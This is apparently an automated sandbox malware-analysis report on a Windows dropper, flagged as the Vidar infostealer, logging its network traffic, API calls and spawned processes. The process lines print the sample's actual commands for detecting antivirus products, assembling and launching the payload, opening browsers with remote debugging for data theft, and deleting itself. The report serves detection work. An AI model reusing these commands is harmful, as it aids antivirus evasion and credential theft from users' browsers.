                Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49757 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49798 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49932 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50046 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50120 version: TLS 1.2
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_0102F7C7
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0102F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_0102F55C
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01049FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_01049FD2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 12.2.Wb.com.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FCFFE0 CloseHandle,NtProtectVirtualMemory,12_2_00FCFFE0
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01024763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_01024763
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01011B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_01011B4D
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_0101F20D
                Source: C:\Users\user\Desktop\ChoForgot.exeFile created: C:\Windows\CommercialGmJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeFile created: C:\Windows\AirMotorsJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeFile created: C:\Windows\PanScoutJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD801712_2_00FD8017
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FBE1F012_2_00FBE1F0
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FCE14412_2_00FCE144
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB22AD12_2_00FB22AD
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FEA26E12_2_00FEA26E
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FCC62412_2_00FCC624
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FEE87F12_2_00FEE87F
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0103C8A412_2_0103C8A4
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FE6ADE12_2_00FE6ADE
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01018BFF12_2_01018BFF
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01022A0512_2_01022A05
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FCCD7A12_2_00FCCD7A
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FDCE1012_2_00FDCE10
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FE715912_2_00FE7159
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0104531112_2_01045311
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB924012_2_00FB9240
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB96E012_2_00FB96E0
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD170412_2_00FD1704
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD7B8B12_2_00FD7B8B
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FB9B6012_2_00FB9B60
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_00FD7DBA12_2_00FD7DBA
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\623615\Wb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: String function: 00FD0DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: String function: 00FCFD52 appears 40 times
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: String function: 004062CF appears 58 times
                Source: ChoForgot.exeStatic PE information: invalid certificate
                Source: ChoForgot.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 12.2.Wb.com.3d0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@95/287@27/16
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_010241FA GetLastError,FormatMessageW,12_2_010241FA
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01012010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_01012010
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01011A0B AdjustTokenPrivileges,CloseHandle,12_2_01011A0B
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_0101DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_0101DD87
                Source: C:\Users\user\Desktop\ChoForgot.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comCode function: 12_2_01023A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_01023A0E
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\VSGN8PPO.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
                Source: C:\Users\user\Desktop\ChoForgot.exeFile created: C:\Users\user\AppData\Local\Temp\nsbF2CF.tmpJump to behavior
                Source: ChoForgot.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\ChoForgot.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\ChoForgot.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chrome.exe, 00000011.00000002.2640091594.000047E400655000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: chrome.exe, 00000011.00000002.2641864869.000047E400A88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};G
                Source: FK68QQ16F.12.dr, D2DTJM79R.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\ChoForgot.exeFile read: C:\Users\user\Desktop\ChoForgot.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\ChoForgot.exe "C:\Users\user\Desktop\ChoForgot.exe"
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 623615
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Distances
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Duck" Ix
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Loud + ..\Kenny + ..\Advisor + ..\Promotes f
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\623615\Wb.com Wb.com f
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,9483855011008134585,3632144003053426118,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2552,i,9281795013285619816,5937589130455718843,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6584 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\623615\Wb.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6896 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                Source: C:\Users\user\Desktop\ChoForgot.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Forth Forth.cmd & Forth.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 623615Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DistancesJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Duck" Ix Jump to behavior
